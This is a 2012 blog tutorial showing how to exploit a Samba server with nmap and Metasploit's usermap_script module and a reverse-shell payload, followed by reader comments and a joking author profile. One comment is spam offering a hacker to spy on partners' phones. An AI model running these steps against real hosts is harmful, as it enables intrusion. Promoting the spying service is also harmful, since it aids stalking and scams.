Exploiting Samba Server On Backtrack 5

Saturday, September 15, 2012

Exploiting Samba Server On Backtrack 5

Aim
-The main aim of this tutorial is to exploit the samba server .
Indentifying Samba Services
To Identifying Samba Services running on Remote System we use nmap .
Command Used : nmap -sV 192.168.118.138
After scanning , it shows the port 139 and port 445 uses Samba services .
See the below image for more details -

Msfconsole
Open msfconsole through a terminal .
Command Used : msfconsole
After enter the command, your ' msfconsole ' will open as shown below

Search Samba Exploit
To Search Samba Exploit , enter the command given below -
Commans Used to search samba exploit : search samba
As you press enter key , it shows the different exploits related to samba .
From the exploits select one which is highlighted in the below image -
See the below image for more help

Use Exploit
Exploit Used : use exploit/multi/samba/usermap_script
See the below image for more details

Show Options
Command Used : show options
This command shows that RHOST is not set . So the next step is to set the Remote Host .
See the below image for more details

Rhost
Command Used : set RHOST <Remote Ip Address >
See the below image for more details

Payload
Command Used : show payloads
See the below image and set the highlighted payload.
See the below image for more details

Set Payload
Command Used : set payload cmd/unix/reverse

Show Options
Command Used : show options
Now set the LHOST (local host address)

Set LHOST
Command Used : set LHOST < Your IpAddress >

Lport
Command Used > set LPORT 445

Command Used
After getting session , you can use commands as shown below -
See the below image -

2 comments:

MantoxDecember 5, 2017 at 8:02 AM
Interesting man! Its 2017 , you could do a post on the NSA hacking exploit for port 445 called double pulsar!

car Seats for 4 olds
best booster seat
best car seat for your kids
booster laws that you must know
infant car seat shoulder strap
Car seat weight limit for infants
ReplyDelete
Replies
David smithSeptember 3, 2019 at 9:15 AM
I know a hacker who can help you spy on your cheating boyfriend's / girlfriend's / spouse phone, whatsapp, facebook, or other platforms just contact brillianthckers800@gmail.com, he is the best out there, he is a professional, trustworthy hacker, he helped reveal my ex wife's secret affairs, he also helped settle bank loans, thanks to him I am now a free man, contact him and he will leave you happy then you can thank me later.
ReplyDelete
Replies

Add comment

ABOUT ME

Name : Cyuzuzo A.

Sex : Male

Relationship Status : Single

Age:16 years old

Nationality: Rwandese

Languages : PHP, Asp, SQL, HTML, Java, perl, HTML/kinyarwanda/Francais/English/

Activities : Information technology, Twitter, Hacker,Facebooking, Blogging

Some less known facts About me:
• Single Digit Addition and subtraction
• Knowledge of alphabets from A- Z
Both In Caps And Smalls
• If you provoke me..I could probably count upto Ten
• Special knowledge of the "F" word.
• Can also sing the national anthem
• I m Allergic 2 Studies of all kinds.
• I hate Flirty Girls.
• I drink equal quantity of pepsi and water in a day